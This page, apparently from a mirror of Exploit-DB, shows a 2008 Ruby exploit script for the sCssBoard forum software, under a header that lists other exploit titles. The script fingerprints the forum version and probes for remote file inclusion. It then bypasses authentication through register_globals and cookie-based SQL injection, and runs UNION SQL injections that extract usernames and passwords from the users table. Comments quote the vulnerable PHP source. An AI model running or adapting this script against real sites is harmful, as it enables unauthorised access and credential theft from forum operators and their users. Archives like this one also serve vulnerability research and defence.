bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/5149.rb
Offensive Security 6cbe6ebbb6 DB: 2021-09-03 
395 changes to exploits/shellcodes

EO Video 1.36 - Local Heap Overflow Denial of Service / (PoC)

Electronics Workbench - '.ewb' Local Stack Overflow (PoC)

BulletProof FTP Client 2.63 - Local Heap Overflow (PoC)

Easy Web Password 1.2 - Local Heap Memory Consumption (PoC)

Compface 1.5.2 - '.xbm' Local Buffer Overflow (PoC)

eEye Retina WiFi Security Scanner 1.0 - '.rws Parsing' Buffer Overflow (PoC)

Zortam MP3 Media Studio 9.40 - Multiple Memory Corruption Vulnerabilities

ImTOO MPEG Encoder 3.1.53 - '.cue' / '.m3u' Local Buffer Overflow (PoC)

ZoIPer 2.22 - Call-Info Remote Denial of Service
PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service
PHP - MultiPart Form-Data Denial of Service (PoC)
PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service
PHP - MultiPart Form-Data Denial of Service (PoC)

Nuked KLan 1.7.7 & SP4 - Denial of Service

AIC Audio Player 1.4.1.587 - Local Crash (PoC)

Xerox 4595 - Denial of Service

WinMerge 2.12.4 - Project File Handling Stack Overflow

Acoustica Mixcraft 1.00 - Local Crash

SopCast 3.4.7 - 'sop://' URI Handling Remote Stack Buffer Overflow (PoC)

Oreans WinLicense 2.1.8.0 - XML File Handling Memory Corruption

Spotify 0.8.2.610 - search func Memory Exhaustion

Apple iTunes 10.6.1.7 - '.m3u' Walking Heap Buffer Overflow (PoC)

WaveSurfer 1.8.8p4 - Memory Corruption (PoC)
DIMIN Viewer 5.4.0 - Crash (PoC)
FreeVimager 4.1.0 - Crash (PoC)
DIMIN Viewer 5.4.0 - Crash (PoC)
FreeVimager 4.1.0 - Crash (PoC)

CoolPlayer+ Portable 2.19.4 - Local Buffer Overflow

Light Audio Player 1.0.14 - Memory Corruption (PoC)

Image Transfer IOS - Remote Crash (PoC)

Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH)

VUPlayer 2.49 - '.cue' Universal Buffer Overflow

Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation

IBM AIX 5.3 - 'libc' MALLOCDEBUG File Overwrite

Hex Workshop 4.23/5.1/6.0 - '.hex' Universal Local Buffer Overflow (SEH)

Soritong MP3 Player 1.0 - '.m3u' / UI.txt Universal Local Buffer Overflow

Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 - Collab getIcon Universal

Millenium MP3 Studio - '.pls' / '.mpf' / '.m3u' Universal Local Buffer Overflow (SEH)

Alleycode HTML Editor 2.2.1 - Local Buffer Overflow

GPG2/Kleopatra 2.0.11 - Malformed Certificate

Free WMA MP3 Converter 1.1 - '.wav' Local Buffer Overflow

OtsTurntables Free 1.00.047 - '.olf' Universal Buffer Overflow

Watermark Master 2.2.23 - '.wstyle' Local Buffer Overflow (SEH)

Dropbox < 3.3.x - OSX FinderLoadBundle Privilege Escalation

MySQL / MariaDB / PerconaDB 5.5.51/5.6.32/5.7.14 - Code Execution / Privilege Escalation
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (1)
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (1)
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)

eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (3)

QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overflow (2)

CA BrightStor ARCserve - 'msgeng.exe' Remote Stack Overflow

quickshare file share 1.2.1 - Directory Traversal (1)

SPlayer 3.7 (build 2055) - Remote Buffer Overflow

Acunetix 8 build 20120704 - Remote Stack Overflow

Omeka 2.2.1 - Remote Code Execution

D-Link DSL-2740R - Remote DNS Change
D-Link DSL-2730U/2750U/2750E ADSL Router - Remote File Disclosure
Netgear JNR1010 ADSL Router - (Authenticated) Remote File Disclosure
D-Link DSL-2730U/2750U/2750E ADSL Router - Remote File Disclosure
Netgear JNR1010 ADSL Router - (Authenticated) Remote File Disclosure

Websphere/JBoss/OpenNMS/Symantec Endpoint Protection Manager - Java Deserialization Remote Code Execution

TorrentTrader 1.0 RC2 - SQL Injection

WEBInsta CMS 0.3.1 - 'templates_dir' Remote File Inclusion

MiniPort@l 0.1.5 Beta - 'skiny' Remote File Inclusion

PHP DocWriter 0.3 - 'script' Remote File Inclusion

phpBB Journals System Mod 1.0.2 RC2 - Remote File Inclusion

phpBB SpamBlocker Mod 1.0.2 - Remote File Inclusion
RSSonate - 'xml2rss.php' Remote File Inclusion
CASTOR 1.1.1 - '/lib/rs.php' Remote File Inclusion
RSSonate - 'xml2rss.php' Remote File Inclusion
CASTOR 1.1.1 - '/lib/rs.php' Remote File Inclusion

QnECMS 2.5.6 - 'adminfolderpath' Remote File Inclusion

BrewBlogger 1.3.1 - 'printLog.php' SQL Injection

e-Ark 1.0 - '/src/ark_inc.php' Remote File Inclusion

awrate.com Message Board 1.0 - 'search.php' Remote File Inclusion

Tucows Client Code Suite (CSS) 1.2.1015 - Remote File Inclusion

Gizzar 03162002 - 'index.php' Remote File Inclusion

SH-News 0.93 - 'misc.php' Remote File Inclusion

JSBoard 2.0.10 - 'login.php?table' Local File Inclusion

XOOPS Module WF-Links 1.03 - 'cid' SQL Injection

Scorp Book 1.0 - 'smilies.php?config' Remote File Inclusion

WEBInsta FM 0.1.4 - 'login.php' absolute_path Remote File Inclusion

mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion

EQdkp 1.3.2 - 'listmembers.php' SQL Injection

FlashBB 1.1.8 - 'sendmsg.php' Remote File Inclusion

SimpleBlog 3.0 - 'comments_get.asp?id' SQL Injection

Pakupaku CMS 0.4 - Arbitrary File Upload / Local File Inclusion

CCMS 3.1 Demo - SQL Injection

MoinMoin 1.5.x - 'MOIND_ID' Cookie Login Bypass

BlogPHP 2 - 'id' Cross-Site Scripting / SQL Injection

AuraCMS 1.62 - Multiple SQL Injections

sCssBoard (Multiple Versions) - 'pwnpack' Remote s

EasyNews 40tr - SQL Injection / Cross-Site Scripting / Local File Inclusion

RevokeBB 1.0 RC11 - 'Search' SQL Injection

Galatolo Web Manager 1.0 - Cross-Site Scripting / Local File Inclusion

CaupoShop Classic 1.3 - 'saArticle[ID]' SQL Injection

PHPortal 1.2 - Multiple Remote File Inclusions

Libera CMS 1.12 - 'cookie' SQL Injection

Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload

WCMS 1.0b - Arbitrary Add Admin

FOSS Gallery Admin 1.0 - Arbitrary File Upload

MemHT Portal 4.0.1 - SQL Injection / Code Execution

Mediatheka 4.2 - Blind SQL Injection

Pligg 9.9.5b - Arbitrary File Upload / SQL Injection

XOOPS 2.3.2 - 'mydirname' PHP Remote Code Execution

Joomla! Component Casino 0.3.1 - Multiple SQL Injections s

ZeusCart 2.3 - 'maincatid' SQL Injection

ASP Football Pool 2.3 - Remote Database Disclosure

LightNEasy sql/no-db 2.2.x - System Configuration Disclosure

Zen Cart 1.3.8 - Remote Code Execution

Joomla! Component com_pinboard - 'task' SQL Injection

Joomla! Component com_bookflip - 'book_id' SQL Injection

Messages Library 2.0 - Arbitrary Delete Message

Arab Portal 2.2 - Blind Cookie Authentication Bypass

Joomla! Plugin JD-WordPress 2.0 RC2 - Remote File Inclusion

REZERVI 3.0.2 - Remote Command Execution

Joomla! Component BF Quiz 1.0 - SQL Injection (2)

E-Xoopport Samsara 3.1 (eCal Module) - Blind SQL Injection

AJ Matrix DNA - SQL Injection

Joomla! Component JE Story Submit - Local File Inclusion

CF Image Hosting Script 1.3.82 - File Disclosure

hastymail2 webmail 1.1 rc2 - Persistent Cross-Site Scripting

CMSLogik 1.2.1 - Multiple Vulnerabilities

C.P.Sub 4.5 - Authentication Bypass

WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload

Joomla! Component com_hdflvplayer < 2.1.0.1 - SQL Injection

WordPress Plugin WP Symposium 14.11 - Arbitrary File Upload

PHPMailer < 5.2.20 - Remote Code Execution

phpIPAM 1.4 - SQL Injection

Joomla! 3.9.0 < 3.9.7 - CSV Injection
2021-09-03 14:58:20 +00:00

706 lines
No EOL
30 KiB
Ruby
Executable file
Raw Blame History

#!/usr/bin/ruby
#inphex - i didnt include all of those bugs into the code,this code basicly checks if the forum is vulnerable and also exploits SQL Injection bug!
#all versions on sourceforge seem to be the same ;\ so check is beeing done on each version. - scb_ is set as default table prefix
#this forum is very very very buggy,probably there are more bugs...those SQL queries etc ive used of course can be modified
#/*
#** sCssBoard, an extremely fast and flexible CSS-based message board system
#** Copyright (CC) 2005 Elton Muuga
#**
#** This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike License.
#** To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-sa/2.0/ or send
#** a letter to Creative Commons, 559 Nathan Abbott Way, Stanford, California 94305, USA.
#*/
#probably not all
#&act=showforum&f=1&t=3%20AND%201=0,blind sql injction
#/functions/post.php
#@mysql_query("insert into $_CON[prefix]posts (posts_main,posts_topic,posts_name,posts_body,posts_starter,posts_posted,posts_forum) values('yes','$next_topic','$topicname','$body','$uid','$currdate_time','$_GET[f]')");
# $topic_post_id = @mysql_fetch_array(@mysql_query("select posts_id from $_CON[prefix]posts where posts_main = 'yes' and posts_topic = '$next_topic'"));
# @mysql_query("update $_CON[prefix]posts set posts_topic_lastpost = '$topic_post_id[0]' where posts_main = 'yes' and posts_topic = '$next_topic'");
#########################################################################################################
#########################################################################################################
#########################################################################################################
#/functions/post.php
#@mysql_query("insert into $_CON[prefix]posts (posts_main,posts_topic,posts_body,posts_starter,posts_posted,posts_forum) values('no','$topic_details[posts_topic]','$body','$uid','$currdate_time','$_GET[f]')");
#########################################################################################################
#########################################################################################################
#########################################################################################################
#/functions/post.php
# @mysql_query("update $_CON[prefix]posts set posts_body = '$body' where posts_id = '$_GET[p]'");
# @mysql_query("update $_CON[prefix]posts set posts_name = '$topicname' where posts_id = '$_GET[p]' and posts_main = 'yes'");
#########################################################################################################
#########################################################################################################
#########################################################################################################
#/functions/post.php
#$edited_post = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]posts where posts_id = '$_GET[p]'"));
#########################################################################################################
#########################################################################################################
#########################################################################################################
#/functions/post.php
# $quoted_post = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]posts where posts_id = '$_GET[q]'"))
#########################################################################################################
#########################################################################################################
#########################################################################################################
#/functions/showforum.php
#$get_cat = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]forums where forums_id = $_GET[f]"));
#$all_topics = @mysql_query("select * from $_CON[prefix]posts where posts_forum = $_GET[f] and posts_main = 'yes' order by posts_topic_lastpost desc");
#$topic_query = @mysql_query("select * from $_CON[prefix]posts where posts_forum = $_GET[f] and posts_main = 'yes' order by posts_topic_lastpost desc limit $start,$end");
#$num_topics = @mysql_num_rows($all_topics);
#
#while($topic_show = @mysql_fetch_array($topic_query)) {
#$total_replies_topic = @mysql_num_rows(@mysql_query("select * from $_CON[prefix]posts where posts_forum = $_GET[f] and posts_topic = '$topic_show[posts_topic]' and posts_main = 'no
#########################################################################################################
#########################################################################################################
#########################################################################################################
#/functions/showtopic.php
#} else {
# if (!$_GET[deltopic]) {
# $result = mysql_query("delete from $_CON[prefix]posts where posts_id = '$_GET[del]'");
# $location_string = "&amp;t=$_GET[t]";
# } else {
# $result = mysql_query("delete from $_CON[prefix]posts where posts_topic = '$_GET[del]'");
# }
#########################################################################################################
#########################################################################################################
#########################################################################################################
#/functions/showtopic.php
#} elseif ($_GET[lock]) {
#
#@mysql_query("update $_CON[prefix]posts set posts_topic_locked = '$_GET[lock]' where posts_topic = '$_GET[t]' and posts_main = 'yes'");
#########################################################################################################
#########################################################################################################
#########################################################################################################
#/functions/showtopic.php
#@mysql_query("update $_CON[prefix]posts set posts_views = posts_views + 1 where posts_topic = $_GET[t] and posts_forum = $_GET[f] and posts_main = 'yes'");
#
#$forum = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]forums where forums_id = $_GET[f]"));
#
#if ($ulvl < $forum[forums_p_read]) { die("<p align='center'>You are not authorized to view this topic.</p>"); }
#
#$topic_perms = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]posts where posts_topic = '$_GET[t]' and posts_main = 'yes'"));
#
# $posts_query = @mysql_query("select * from $_CON[prefix]posts where posts_topic = '$_GET[t]' and posts_forum = $_GET[f] and posts_main = 'yes'");
#########################################################################################################
#########################################################################################################
#########################################################################################################
#/functions/showtopic.php
#$all_replies = @mysql_query("select * from $_CON[prefix]posts where posts_forum = $_GET[f] and posts_topic = $_GET[t] and posts_main = 'no'");
# $replies_query = @mysql_query("select * from $_CON[prefix]posts where posts_forum = $_GET[f] and posts_topic = $_GET[t] and posts_main = 'no' order by posts_posted asc limit $start,$end");
# $num_replies = @mysql_num_rows($all_replies);
# if ((!$_GET[level_h]) and (!$_GET[level])) {
# $users_query = mysql_query("select * from $_CON[prefix]users");
# } elseif ($_GET[level_h]) {
# $users_query = mysql_query("select * from $_CON[prefix]users where users_level >= '$_GET[level_h]'");
# echo mysql_error();
# } elseif ($_GET[level]) {
# $users_query = mysql_query("select * from $_CON[prefix]users where users_level = '$_GET[level]'");
# }
#$numposts = mysql_num_rows(mysql_query("select * from $_CON[prefix]posts where posts_starter = '$users_show[users_id]'"));
#########################################################################################################
#########################################################################################################
#########################################################################################################
#/functions/register.php
#@mysql_query("insert into $_CON[prefix]users(users_username,users_password,users_email,users_style) values('$username','$password','$email','$_MAIN[default_style]')");
#########################################################################################################
#########################################################################################################
#########################################################################################################
#########################################################################################################
#########################################################################################################
#########################################################################################################
#admin/forums.php
#} else {
#
# $done = @mysql_query("insert into $_CON[prefix]categories(category_name) values('$_POST[cat_name]')");
# if ($done == 1) {
# echo "<center><b>Category ($_POST[cat_name]) created.</b></center><br /><br />";
# echo redirect("?act=admin-forums", 1);
# } else {
# echo "<center><b>Sorry, I was unable to create the category.</b></center><br /><br />";
# }
#########################################################################################################
#########################################################################################################
#########################################################################################################
#/admin/forums.php
#} elseif ($_GET[editcat]) {
#
# if (!$_GET[go]) {
#
#$category_2edit = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]categories where category_id = '$_GET[editcat]'"));
#########################################################################################################
#########################################################################################################
#########################################################################################################
#/admin/forums.php
# if ($_POST[cat_name] != "") {
# $done = @mysql_query("update $_CON[prefix]categories set category_name = '$_POST[cat_name]' where category_id = '$_GET[editcat]'");
#########################################################################################################
#########################################################################################################
#########################################################################################################
#/admin/forums.php
#} elseif ($_GET[delcat]) {
#
# if (!$_GET[go]) {
# $category_2del = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]categories where category_id = '$_GET[delcat]'"));
#########################################################################################################
#########################################################################################################
#########################################################################################################
#/admin/forums.php
#@mysql_query("delete from $_CON[prefix]categories where category_id = '$_GET[delcat]'");
#########################################################################################################
#########################################################################################################
#########################################################################################################
#/admin/forums.php
#//**********************************************************************
#// Begin Edit Forum
#//**********************************************************************
#
#} elseif ($_GET[editforum]) {
#
# if (!$_POST[forums_name]) {
# $forum_2edit = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]forums where forums_id = '$_GET[editforum]'"));
#########################################################################################################
#########################################################################################################
#########################################################################################################
#/admin/forums.php
# } else {
#
# $done = @mysql_query("update $_CON[prefix]forums set forums_name = '$_POST[forums_name]', forums_category = '$_POST[forums_category]', forums_description = '$_POST[forums_desc]', forums_p_read = '$_POST[forums_p_read]', forums_p_topic = '$_POST[forums_p_topic]', forums_p_reply = '$_POST[forums_p_reply]' where forums_id = '$_GET[editforum]'");
#########################################################################################################
#########################################################################################################
#########################################################################################################
#/admin/forums.php
#} elseif ($_GET[delforum]) {
#
# if (!$go) {
#
# $forum_2del = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]forums where forums_id = '$_GET[delforum]'"));
#########################################################################################################
#########################################################################################################
#########################################################################################################
#/admin/forums.php
# @mysql_query("delete from $_CON[prefix]posts where posts_forum = '$_GET[delforum]'");
# @mysql_query("delete from $_CON[prefix]forums where forums_id = '$_GET[delforum]'");
#########################################################################################################
#########################################################################################################
#########################################################################################################
#/admin/forums.php
#} elseif ($_GET[reorder]) {
#
# $cat_order = $_POST[cat_order];
# $forum_order = $_POST[forum_order];
#
# foreach($cat_order as $c_id => $c_order) {
#
# @mysql_query("update $_CON[prefix]categories set category_order = '$c_order' where category_id = '$c_id'");
#
#}
#
# foreach($forum_order as $f_id => $f_order) {
#
# @mysql_query("update $_CON[prefix]forums set forums_order = '$f_order' where forums_id = '$f_id'");
#
# }
# echo redirect("?act=admin-forums");
#########################################################################################################
#########################################################################################################
#########################################################################################################
#if ($board_name) {
# @mysql_query("update $_CON[prefix]settings set setting_value = '$_POST[board_name]' where setting_name = 'board_name'");
# @mysql_query("update $_CON[prefix]settings set setting_value = '$_POST[allow_signups]' where setting_name = 'allow_signups'");
# @mysql_query("update $_CON[prefix]settings set setting_value = '$_POST[cookie_url]' where setting_name = 'cookie_url'");
# @mysql_query("update $_CON[prefix]settings set setting_value = '$_POST[cookie_path]' where setting_name = 'cookie_path'");
# @mysql_query("update $_CON[prefix]settings set setting_value = '$_POST[redir_method]' where setting_name = 'redir_method'");
# @mysql_query("update $_CON[prefix]settings set setting_value = '$_POST[sig_bbcode]' where setting_name = 'sig_bbcode'");
# @mysql_query("update $_CON[prefix]settings set setting_value = '$_POST[debug_level]' where setting_name = 'debug_level'");
# @mysql_query("update $_CON[prefix]settings set setting_value = '$_POST[date_format]' where setting_name = 'date_format'");
# @mysql_query("update $_CON[prefix]settings set setting_value = '$_POST[default_style]' where setting_name = 'default_style'");
# @mysql_query("update $_CON[prefix]settings set setting_value = '$_POST[use_relative_dates]' where setting_name = 'use_relative_dates'");
# echo "<center><b>Settings saved.</b></center><br /><br />";
# echo redirect("?act=admin-general", 1);
#########################################################################################################
#########################################################################################################
#########################################################################################################
#old version
#if($_GET[setcookie]) {
# $checkagain = mysql_fetch_array(mysql_query("select * from $_CON[prefix]users where users_username = '$_GET[u]' and users_password = '$_GET[p]'"));
# echo mysql_error();
# if ($_GET[r] == 1) {
# setcookie("sCssBoard",$checkagain[users_password],time()+2592000,"$_MAIN[cookie_path]","$_MAIN[cookie_url]");
# } else {
# setcookie("sCssBoard",$checkagain[users_password],0,"$_MAIN[cookie_path]","$_MAIN[cookie_url]");
# }
#}
require 'open-uri'
require 'net/http'
require 'net/https'
require 'base64'
require 'irb'
require 'uri'
#Session Hijacking
#} elseif ($_GET[act] == "logout") {
# echo "<p align='center'>";
# if(!$current_user) {
# echo "You cannot log out, because you are not logged in.";
# } else {
# setcookie("scb_uid",0,time()-2592000,"$_MAIN[cookie_path]","$_MAIN[cookie_url]");
# setcookie("scb_ident",0,time()-2592000,"$_MAIN[cookie_path]","$_MAIN[cookie_url]");
# echo "Logged out successfully.";
# echo redirect("index.php");
# }
# echo "</p><br />";
#########################################################################################################
# $body = $_POST[body];
#if($body == "") {
# echo "<p align='center' style='background-color:#fff; color:#333; padding:10px;'>Error: The post was left blank. <a href='javascript:history.back()'>Back...</a></p>";
# } else {
# $topic_details = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]posts where posts_forum = '$_GET[f]' and posts_topic = '$_GET[t]' and posts_main = 'yes'"));
x = 0
cmd_n = { "-h" => "host","-p" => "path"}
cmd_v = {}
set = {}
puts "usage: rub -h host.com -p /path/"
ARGV.each do |a|
x += 1
cmd_n.each do |l,v|
if a == l
cmd_v[v] = ARGV[x]
end
end
end
class Pwnag
r_g = 0
m_g = 0
def initialize(host,path,version) #let's start PWNZIN'
puts "-Going through sCssBoard Version: #{version}\n"
puts "-Checking php.ini settings\n"
req = General.new()
con = req.request(host,path+"index.php?&act=xxx&inc_function=registerglobalson-'S","")
if con =~ /registerglobalson/ then
puts "-register_globals = ON\n"
r_g = 1
else
puts "-register_globals = OFF\n"
r_g = 0
end
if con=~/registerglobalson-'S/
puts "-magic_quotes_gpc = OFF\n"
m_g = 0
else
puts "-magic_quotes_gpc = ON\n"
m_g = 1
end
req = General.new()
con = req.request(host,path+"index.php?act=profile&u='union%20select%2032498394829,32982890280927337,1,1,1,1,1,1,1,1,1,1'","")
if con=~/32982890280927337/ then
puts "-magic_quotes_gpc = OFF\n"
m_g = 0
else
puts "-magic_quotes_gpc = ON\n"
m_g = 1
end
if r_g == 1 && m_g == 0
puts "-Excellent,very very easy to exploit"
else if r_g == 0 && m_g == 1
puts "-Bad luck,hard to exploit"
else if r_g == 0 && m_g == 0
puts "-Quite easy to exploit"
else if r_g == 1 && m_g == 1
puts "-Yo,quite easy"
end
end
end
end
req.exploit_shit(host,path,version)
end
end
class Ownstance
version = "1.1"
supported = ["1.0","1.11","1.12"]
con = ""
def initialize(set)
unless set[:host] or set[:path] != nil
puts "HTTP Host/path?"
exit
end
end
def checkversion(host,path)
req = General.new()
con = req.request(host,path,"")
if con=~/sCssBoard<\/a> 1.12/ then
version = 1.12
else if con =~/sCssBoard<\/a> 1.11/ then
version = 1.11
else if con=~/sCssBoard<\/a> 1.0/ then
version = 1.0
else
version = "unknown"
end
end
end
pwn = Pwnag.new(host,path,version)
end
end
class General
tb_prefix = "scb_"
a_pb = nil
def exploit_shit(host,path,version)
puts "-Trying to exploit sCssBoard #{version}\n"
if version == 1.12
puts "-------------------Checking for FILE INCLUSION Bugs-------------------"
version_112_1(host,path)
puts "-------------------END FILE INCLUSION BUGS-------------------"
puts "-------------------Checking for AUTHENTICATION Bugs-------------------"
version_112_2(host,path)
version_112_6(host,path)
puts "-------------------END AUTHENTICATION Bugs-------------------"
puts "-------------------Starting to check for SQL Injection bugs-------------------" #there are more possible
version_112_3(host,path)
version_112_4(host,path)
version_112_5(host,path)
version_112_7(host,path)
puts "-------------------END SQL Injection-------------------"
else if version == 1.11
puts "-------------------Checking for FILE INCLUSION Bugs-------------------"
version_112_1(host,path)
puts "-------------------END FILE INCLUSION BUGS-------------------"
puts "-------------------Checking for AUTHENTICATION Bugs-------------------"
version_112_2(host,path)
version_112_6(host,path)
puts "-------------------END AUTHENTICATION Bugs-------------------"
puts "-------------------Starting to check for SQL Injection bugs-------------------"
version_112_3(host,path)
version_112_4(host,path)
version_112_5(host,path)
version_112_7(host,path)
puts "-------------------END SQL Injection-------------------"
else if version == 1.0
puts "-------------------Checking for FILE INCLUSION Bugs-------------------"
version_112_1(host,path)
puts "-------------------END FILE INCLUSION BUGS-------------------"
puts "-------------------Checking for AUTHENTICATION Bugs-------------------"
version_112_2(host,path)
version_112_6(host,path)
puts "-------------------END AUTHENTICATION Bugs-------------------"
puts "-------------------Starting to check for SQL Injection bugs-------------------"
version_112_3(host,path)
version_112_4(host,path)
version_112_5(host,path)
version_112_7(host,path)
else
puts "-------------------Checking for FILE INCLUSION Bugs-------------------"
version_112_1(host,path)
puts "-------------------END FILE INCLUSION BUGS-------------------"
puts "-------------------Checking for AUTHENTICATION Bugs-------------------"
version_112_2(host,path)
version_112_6(host,path)
puts "-------------------END AUTHENTICATION Bugs-------------------"
puts "-------------------Starting to check for SQL Injection bugs-------------------"
version_112_3(host,path)
version_112_4(host,path)
version_112_5(host,path)
version_112_7(host,path)
end
end
end
end
def version_112_1(host,path)
#########################################################################################################
#$functions = array (
# "home" => "functions/main.php",
# "register" => "functions/register.php",
# "login" => "functions/loginlogout.php",
# "logout" => "functions/loginlogout.php",
# "profile" => "functions/profile.php",
# "post" => "functions/post.php",
# "users" => "functions/users.php",
# "search" => "functions/search.php",
# "search-results" => "functions/searchresults.php",
# "showforum" => "_showforum",
# //--------------------
# "admin-home" => "admin/main.php",
# "admin-general" => "admin/general.php",
# "admin-forums" => "admin/forums.php"
# );
#foreach ($functions as $func => $address) {
# if ($act == $func) {
# $inc_function = $address;
# break;
# }
#}
#
#if ($inc_function == "_showforum") {
# if ($_GET[t] == "") {
# $inc_function = "functions/showforum.php";
# } else {
# $inc_function = "functions/showtopic.php";
# }
#}
#if ($inc_function) {
# include($inc_function); //probably rfi,lfi
#} else {
# include("functions/main.php");
#}
######################################################################################################### -
con = request(host,path+"index.php?&act=xxxxxxx&inc_function=http://shellpathownmeinph","")
if con =~/URL file-access is disabled/ #automaticly means that inc_function has been given
puts "URL File-access = OFF\n"
end
if con=~/shellpathownmeinph/
puts "This forum is vulnerable to RFI/LFI/RCE... ->index.php?&act=xxxxxxx&inc_function=shell\n"
end
end
def version_112_2(host,path)
#########################################################################################################
#if ($current_user[users_level] < 3) {
# die("Insufficient access level.");
#}
# if($_GET[update] == "now") {
# if (($current_user[users_level] < 3) and ($_GET[u] != $_COOKIE[scb_uid])) {
# die("You do not have the necessary permissions to modify this profile.");
# }
#########################################################################################################
con = request(host,path+"admin/forums.php?current_user[users_level]=4","")
if con=~/Insufficient access level/
else
puts "This forum is vulnerable to AUTH_BYPASS,$current_user[users_level] -> host/path/admin/forums.php?current_user[users_level]=4"
end
end
def version_112_3(host,path)
#########################################################################################################
#if ($_GET[viewcat]) {
#$category_query = mysql_query("select * from $_CON[prefix]categories where category_id = '$_GET[viewcat]'");
#########################################################################################################
con = request(host,path+"index.php?viewcat='union%20select%201,2,32982890280927337'","")
if con=~/32982890280927337/
puts "This forum is vulnerable to SQL Injection,index.php?viewcat='sql\n"
end
end
def version_112_4(host,path)
#########################################################################################################
# if($_GET[f] == "") {} else {
#$forum = mysql_fetch_array(mysql_query("select * from $_CON[prefix]forums where forums_id = $_GET[f]"));
# echo mysql_error();
# if ($forum[forums_p_read] <= $ulvl) {
#$topic = mysql_fetch_array(mysql_query("select * from $_CON[prefix]posts where posts_id = $_GET[t] and posts_forum = $_GET[f] and posts_main = 'yes'"));
#########################################################################################################
con = request(host,path+"index.php?&act=showforum&f=-1%20union%20select%201,2,3,32982890280927337,5,1,1,1","")
if con=~/32982890280927337/
puts "This forum is vulnerable to SQL Injection,index.php?&act=showforum&f=-1 sql\n"
end
con = request(host,path+"index.php?&act=showforum&f=-1%20union%20select%201,2,3,users_username,5,1,1,1%20from%20scb_users","")
puts "Username:"
regex = /<title>(.*?)<\/title>/
credentials = con.scan(regex)
puts credentials[0]
con = request(host,path+"index.php?&act=showforum&f=-1%20union%20select%201,2,3,users_password,5,1,1,1%20from%20scb_users","")
puts "Password:"
regex = /<title>(.*?)<\/title>/
credentials = con.scan(regex)
puts credentials[0]
end
def version_112_5(host,path)
#no check?
#if (!$_GET[u]) {
# $user = $current_user[users_id];
#} else {
# $user = $_GET[u];
#}
#$user_details = mysql_fetch_array(mysql_query("select * from $_CON[prefix]users where users_id = '$user'"));
con = request(host,path+"index.php?act=profile&u='union%20select%2032498394829,32982890280927337,1,1,1,1,1,1,1,1,1,1'","")
if con=~/32982890280927337/
puts "This forum is vulnerable to SQL Injection,index.php?act=profile&u='sql\n"
end
end
def version_112_6(host,path)
######################################################################################################### -
#if (($_COOKIE[scb_uid]) and ($_COOKIE[scb_ident])) {
#$current_user = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]users where users_id = '$_COOKIE[scb_uid]' and users_password = '$_COOKIE[scb_ident]'"));
######################################################################################################### -
con = request(host,path+"index.php","scb_uid=1'; scb_ident='1=1")
if con=~/Logged in as/
puts "This forum is vulnerable to AUTH_BYPASS,_COOKIE -> set cookie to scb_uid=1'; scb_ident='1=1\n"
end
end
def version_112_7(host,path)
end
def request(host,path,cookie)
http = Net::HTTP.new(host, 80)
http.use_ssl = false
path = path
headers = {
'Cookie' => cookie
}
resp, data = http.get(path, headers)
return data
end
def blind_sql
puts "Lol"
end
end
set[:host] = cmd_v["host"].gsub(/http\:\/\//, "")
set[:path] = cmd_v["path"]
scss = Ownstance.new(set)
scss.checkversion(set[:host] ,set[:path])
# milw0rm.com [2008-02-18]
Reference in a new issue View git blame Copy permalink